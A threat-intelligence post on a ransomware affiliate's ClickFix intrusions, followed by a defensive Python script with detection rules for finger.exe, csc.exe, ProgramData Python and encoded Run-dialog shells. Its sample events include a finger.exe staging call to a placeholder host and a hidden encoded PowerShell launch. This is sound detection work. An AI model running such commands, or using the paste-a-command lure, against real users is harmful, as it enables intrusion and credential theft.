Mark0
Termite ransomware breaches linked to ClickFix CastleRAT attacks

Velvet Tempest (DEV-0504), a prolific ransomware affiliate associated with high-profile groups like Ryuk and LockBit, has been observed leveraging the "ClickFix" social engineering technique to breach corporate networks. This method involves tricking users into pasting obfuscated commands into the Windows Run dialog, which initiates a chain of execution using native system tools.

The threat actor uses legitimate Windows utilities such as finger.exe and csc.exe to stage payloads, including DonutLoader and the CastleRAT backdoor. During a 12-day observation by MalBeacon, the group performed Active Directory reconnaissance, harvested credentials from Chrome, and established persistence using Python-based components placed in the ProgramData directory.

While Velvet Tempest is frequently linked to Termite ransomware and double-extortion attacks, this specific campaign highlights their evolving tactics for initial access and lateral movement. The use of user-assisted command execution and living-off-the-land techniques continues to pose a significant challenge for modern security infrastructures.
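The post names the observable pieces of this chain: a command pasted into the Run dialog (so a shell spawned by explorer.exe), finger.exe and csc.exe used as staging tools, and Python components living under ProgramData. The script below is an added example, not code from the post or from MalBeacon, showing how a defender could turn those observables into process-creation rules. It assumes events arrive as dicts with `image`, `parent_image` and `command_line` keys, as a Sysmon Event ID 1 or Windows 4688 collector might emit them; the sample events, hostnames and paths are constructed for the example.

```python
"""Process-creation triage for the ClickFix / LOLBin chain described in the post.

Assumption (not from the post): each event is a dict with keys
'image', 'parent_image' and 'command_line'. Sample events below are
constructed; 203.0.113.10 is a documentation address, not an IoC.
"""
import re
from pathlib import PureWindowsPath

# Script hosts that normally do not drive the C# compiler on a user workstation.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe",
                "mshta.exe", "wscript.exe", "cscript.exe"}

ENCODED_SHELL = re.compile(r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{40,}", re.I)


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return PureWindowsPath(path).name.lower()


def classify(event: dict) -> list[str]:
    """Return the names of every rule the event matches; empty list if none."""
    image = _basename(event["image"])
    parent = _basename(event["parent_image"])
    cmd = event.get("command_line", "")
    hits = []

    # finger.exe is a rarely used TCP/79 client; any invocation deserves a look.
    if image == "finger.exe" or re.search(r"\bfinger(\.exe)?\b", cmd, re.I):
        hits.append("finger_lolbin")

    # C# compiler launched by a script host rather than an IDE or build tool
    # (PowerShell's Add-Type does this too, so treat it as a lead, not a verdict).
    if image == "csc.exe" and parent in SCRIPT_HOSTS:
        hits.append("csc_from_script_host")

    # Python interpreter running a script that lives under ProgramData.
    if image in {"python.exe", "pythonw.exe"} and re.search(r"\\ProgramData\\", cmd, re.I):
        hits.append("python_from_programdata")

    # Shell started directly by explorer.exe with a long or encoded command
    # line, consistent with a one-liner pasted into the Run dialog.
    if image in {"cmd.exe", "powershell.exe", "pwsh.exe"} and parent == "explorer.exe" \
            and (len(cmd) > 200 or ENCODED_SHELL.search(cmd)):
        hits.append("explorer_spawned_shell_encoded")

    return hits


def triage(events: list[dict]) -> list[tuple[int, list[str]]]:
    """(index, matched rules) for every event that matched at least one rule."""
    results = []
    for i, event in enumerate(events):
        hits = classify(event)
        if hits:
            results.append((i, hits))
    return results


# Constructed sample events: one benign, then one per rule, plus a benign csc.exe.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "notepad.exe notes.txt"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "cmd.exe /c finger.exe update@203.0.113.10"},
    {"image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'csc.exe /noconfig /fullpaths @"C:\Users\u\AppData\Local\Temp\x.cmdline"'},
    {"image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "parent_image": r"C:\Program Files\Microsoft Visual Studio\Common7\IDE\devenv.exe",
     "command_line": "csc.exe /target:library Program.cs"},
    {"image": r"C:\Users\u\AppData\Local\Programs\Python\pythonw.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"pythonw.exe C:\ProgramData\svc\agent.py"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe -w hidden -enc " + "A" * 60},
]

if __name__ == "__main__":
    for index, rules in triage(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index]["command_line"][:60], rules)
```

Each rule is deliberately narrow and keyed to a single observable from the post, so a hit is a lead for an analyst rather than a verdict; the explorer.exe-to-shell rule in particular will also fire on benign administrators who paste encoded commands, and the csc.exe rule on PowerShell `Add-Type`, which is why the output keeps the matched rule names rather than collapsing them into one score.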
